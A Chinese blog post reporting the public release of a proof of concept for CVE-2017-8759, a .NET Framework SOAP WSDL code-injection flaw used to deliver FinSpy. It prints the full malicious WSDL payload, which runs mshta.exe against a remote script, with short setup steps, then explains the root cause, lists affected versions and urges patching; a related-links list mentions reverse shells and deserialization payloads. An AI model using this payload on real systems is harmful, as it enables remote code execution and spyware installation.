.NET最新漏洞CVE-2017-8759 POC已公布,大规模攻击即将来临

最新推荐文章于 2024-05-24 08:00:00 发布
最新推荐文章于 2024-05-24 08:00:00 发布
阅读量191 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/blackorbird/article/details/102462163
版权

0?wx_fmt=png

图  世界范围内感染FinSpy 图(即漏洞利用导致下载的间谍程序)

前天微软刚补好的漏洞,昨天fireeye发文,然后各平台开始写报告

然而昨天在ISC大会,今天就看见poc被公布了

https://github.com/vysec/CVE-2017-8759

<definitions

xmlns="http://schemas.xmlsoap.org/wsdl/"

xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/"

xmlns:suds="http://www.w3.org/2000/wsdl/suds"

xmlns:tns="http://schemas.microsoft.com/clr/ns/System"

xmlns:ns0="http://schemas.microsoft.com/clr/nsassem/Logo/Logo">

<portType name="PortType"/>

<binding name="Binding" type="tns:PortType">

<soap:binding transport="http://schemas.xmlsoap.org/soap/http"/>

<suds:class type="ns0:Image" rootType="MarshalByRefObject"></suds:class>

</binding>

<service name="Service">

<port name="Port" binding="tns:Binding">

<soap:address location="https://example.com?C:\Windows\System32\mshta.exe?https://example.com/cmd.jpg"/>

<soap:address location=";

if (System.AppDomain.CurrentDomain.GetData(_url.Split('?')[0]) == null) {

System.Diagnostics.Process.Start(_url.Split('?')[1], _url.Split('?')[2]);

System.AppDomain.CurrentDomain.SetData(_url.Split('?')[0], true);

} //"/>

</port>

</service>

</definitions>

把上面的报文放在服务器,样本请求该服务器,然后本地再加载dll就好了

本地放上那个github上面的bin文件

这个漏洞个人觉得很厉害,.NET框架每台机子基本都装着,内网的机子都不能更新的情况下,感觉目前网上居然对这个事情还觉得不是很严重的样子。。

https://www.youtube.com/watch?time_continue=1&v=hlkx5uYBT1Y

0?wx_fmt=png

可以看出多出来了两个文件,并且被执行

0?wx_fmt=png

原理就是黑客构造一个服务器,然后样本访问该服务器会返回xml

然后本地的.NET服务通过解析这个xml会触发漏洞,该漏洞是由于.NET当中有个代码文件对换形符没有做过过滤,从而导致可以用注释的方式把

在.net库中的SOAP WSDL 解析模块IsValidUrl函数没有正确处理包含回车换行符的情况,导致调用者函数PrintClientProxy存在代码注入执行漏洞。

0?wx_fmt=png

WSDL通过 PrintClientProxy函数去解析文件。当解析文件中包含多个地址时,会将后面的地址注释掉。然而IsValidUrl函数在验证URL时,并没有对换行符判断处理,导致后面可以插入任意代码。

0?wx_fmt=png

以下为解析后生成的代码。因为其中包含换行,导致后面的代码没有注释成功。

0?wx_fmt=png

最后通过csc.exe编译以上代码,在同目录下生成一个dll。之后Office会调用LoadLibrary加载该dll并执行。dll的功能是通过mshta.exe去执行链接指向的hta脚本文件。

0?wx_fmt=png

利用成功图

0?wx_fmt=png

影响范围也是巨大的

Microsoft .NET Framework 4.6.2 

Microsoft .NET Framework 4.6.1 

Microsoft .NET Framework 3.5.1 

Microsoft .NET Framework 4.7

Microsoft .NET Framework 4.6

Microsoft .NET Framework 4.5.2

Microsoft .NET Framework 3.5

Microsoft .NET Framework 2.0 SP2

更新系统,微软已经有补丁了的

走过路过给个关注,谢谢支持~

blackorbird
关注
.NET Framework漏洞(CVE-2017-8759)复现及后续渗透
sanc7ane的博客
02-25 7369
参考:!bhdresh 简介 CVE-2017-8759是一个新型的Office文档高级威胁攻击漏洞,该漏洞允许恶意人士在解析SOAP WSDL的定义内容期间注入任意代码。FireEye公司对该微软Office文档进行了分析,并发现攻击者能够利用代码注入方式下载并执行一份包含PowerShell指令的Visual Basic脚本。黑客在Offcie文档中嵌入新的Moniker对象,利用的是.net...
微软.NET Framework cve-2017-8759 复现
weixin_30604651的博客
09-19 262
0x00 漏洞前言 FireEye公司最近发现一份恶意微软Office RTF文档,其中利用到一项SOAP WSDL解析器代码注入漏洞——编号CVE-2017-8759。该漏洞允许恶意人士在解析SOAP WSDL的定义内容期间注入任意代码。FireEye公司对该微软Office文档进行了分析,并发现攻击者能够利用代码注入方式下载并执行一份包含PowerShell指令的Visual ...
.NET漏洞分析 | 绕过某和OA全局权限验证
最新发布
ahhacker86的专栏
05-24 1282
文章首发:先知社区,原文地址:https://xz.aliyun.com/t/14517此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他方面。
WEB攻防-.NET特性常见漏洞
weixin_45534587的博客
04-25 1267
C#编译成DLL或EXE文件:C#编写的代码在编译时会生成DLL或EXE文件,这些文件包含MSIL代码。.NET提供运行时环境:.NET框架的CLR提供运行时环境,负责将MSIL代码编译成机器码并执行。DLL文件是.NET程序集:在.NET中,DLL文件是程序集的一种形式,它包含可由多个应用程序共享的代码。因此,C#、.NET和DLL文件之间的关系是:C#编写的代码编译成包含MSIL代码的DLL或EXE文件,这些文件在.NET框架的CLR运行时环境中执行。
干货 | 最新Windows事件查看器.NET反序列化漏洞分析
zls365365的博客
06-02 506
0x01 漏洞背景4月26日@Orange Tsai 在Twitter上发表一个有关Windows事件查看器的反序列化漏洞,可以用来绕过Windows Defender或者ByPass UAC等其它攻击场景,Orange视频里也给出了攻击载荷 DataSet“ysoserial.exe -o raw -f BinaryFormatter -g DataSet -c ca...
CVE-2017-7269-Echo-PoCCVE-2017-7269回显PoC,用于远程入侵检测。
03-02
我们团队对此次发布CVE-2017-7269漏洞的分析报告: ://ht-sec.org/cve-2017-7269-vulnerabilities/ DefaultPoC只能弹calc.exe ,现在修改成可以响应请求,命令格式为: CVE-2017-7269_remote_echo.py ip_address...
CVE-2017-3506-Poc.zip_CVE-2017-3506_CVE-2017-3506 poc_CVE-2017-3
09-24
2017年,Apache Struts2曝出一个严重的安全漏洞,即CVE-2017-3506,这个漏洞允许远程攻击者在未授权的情况下执行任意代码,从而对系统造成严重威胁。 **漏洞概述** CVE-2017-3506,又称为S2-048,是由于Struts2...
44913_sale3ho_CVE-2017-12636_POC_
09-30
标题 "44913_sale3ho_CVE-2017-12636_POC_" 提供的信息表明,这是一个与安全漏洞CVE-2017-12636相关的PoC(Proof of Concept)代码。POC通常是由安全研究人员或黑客创建的,用于证明一个特定漏洞确实存在并且可以被...
cve-2017-10271-poc.py weblogic反序列化 WLS
01-02
python2.x 最新weblogic反序列化漏洞利用工具 WLS /wls-wsat/CoordinatorPortType
最新Windows事件查看器.NET反序列化漏洞复现与分析
Brucetg的博客
04-30 2546
0x01. 漏洞描述 4月26日在twitter上看到Orange师傅发布了个windows事件查看器的 .Net 反序列化漏洞,感觉有点意思,故抽空简单做个复现与分析。 0x02. 漏洞复现 测试环境:Windows 11,ARM版 作者给的payload: ysoserial.exe -o raw -f BinaryFormatter -g DataSet -c calc > %LOCALAPPDATA%\Microsoft\Eventv~1\RecentViews 其中,%LOCALAP
一个简单的POC来演示.NET调试注入的强大功能-C/C++开发
05-27
一个简单的POC,用于显示在没有不受管存根的情况下注入代码时显示.NET调试功能的功能。 DotNetDebug一个简单的POC,用于显示在无托管根的情况下注入代码时.NET调试功能的强大功能。 构建建议您以x64模式构建此POC,以获得最佳结果。 可以使用以下命令通过Visual Studio或MSBuild完成此操作:msbuild.exe DotNetDebug.sln / property:Platform = x64运行可以在以下模式下运行此工具:附加-通过名称附加到正在运行的进程attachpid-附加到通过PID启动运行过程-Laun
常见Exp漏洞POC集合
01-21
该资源为bugscan收集的漏洞poc,喜欢的可以下载下来看看,有需要其他资源的也可以发邮件与我交流shulanyy@gmail.com,作为爱好他是免费的。
CVE-2017-8759
nethm的专栏
09-24 649
预留 https://bbs.pediy.com/thread-221414.htm http://bobao.360.cn/learning/detail/4411.html
代码审计-ASP.NET项目-未授权访问漏洞
xiaoheizi的博客
08-13 2279
Inherits msdn解释:定义提供给页继承的代码隐藏类。 它可以是从 Page 类派生的任何类。 此特性与 CodeFile 特性一起使用,后者包含指向代码隐藏类的源文件的路径。 Inherits 特性在使用 C# 作为页面语言时区分大小写,而在使用 Visual Basic 作为页面语言时不区分大小写。
2021-08-27 网安实验-Windows系统渗透测试之.NET框架0Day漏洞(CVE-2017-8759)
热门推荐
时光隧道
08-27 4万+
实验步骤一 1.首先从网上下载CVE-2017-8759漏洞exp到本地目录: git clone https://github.com/bhdresh/CVE-2017-8759.git 生成漏洞文档 2.利用msfvenom生成反弹shell程序,放置在/tmp/shell.exe位置,等待调用。 3.监听本机端口,等待用户点击包含漏洞代码的文档文件,反弹shell窗口。 4.重新开一个Shell窗口,使用漏洞利用脚本,构建一个简单的web服务,并等待用户执行漏洞文件,访问该页面执行漏洞代码,反
漏洞复现】SOAP WSDL解析器代码注入漏洞CVE-2017-8759
VI___
01-10 4730
一、CVE-2017-8759 ——类型:.NET Framework漏洞 https://www.freebuf.com/articles/system/147602.html 二、准备 攻击机:kali-2019 192.168.75.149 靶机:win7_x86(关闭防火墙) 192.168.75.139 三、复现过程 1、下载 exp,并将 cm...
[应用漏洞]CVE-2015-7450 WebSphere命令执行
不忘初心,护天下安全!
07-28 4716
本文参考https://mp.weixin.qq.com/s/nfdyCKMP-dkTWx5SIMX1bg 一、WebSphere WebSphere 是 IBM 的软件平台。它包含了编写、运行和监视全天候的工业强度的随需应变 Web 应用程序和跨平台、跨产品解决方案所需要的整个中间件基础设施,如服务器、服务和工具。WebSphere 提供了可靠、灵活和健壮的软件。它是一个模块化的平台,基于业界支持的开放标准。可以通过受信任和持久的接口,将现有资产插入 WebSphere,可以继续扩展环境。WebSph
Netis路由器后门3月内遭5700万次扫描
weixin_33796205的博客
07-03 160
网络解决方案提供商 Netis Systems 的路由器后门已不是新闻,但这个后门在两年曝光后之后,竟然一直延续至今。 趋势科技研究人员警告,自8月以来,有数千万次对该漏洞的探测扫描被记录。攻击者可通过这个漏洞完全控制该设备,只需知道该路由器外部IP地址,然后防问 UDP 53413 端口,接着输入固件中硬编码的口令,至此大功造成。 获取到受影响设备的完...
ASP.NET安全漏洞
dbjtimve93993的博客
05-21 660
ASP.NET安全漏洞[原文发表地址]:Important: ASP.NET Security Vulnerability[原文发表时间]:2010/9/18 4:23 AM几个小时前,我们发布了一个关于ASP.NET安全漏洞的Microsoft 安全警告,该漏洞存在于目前所有的ASP.NET版本。该漏洞是在上周五的一个安全会议上发现的。我们建议所有的客户立即采取补救措施(见下文)来预...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值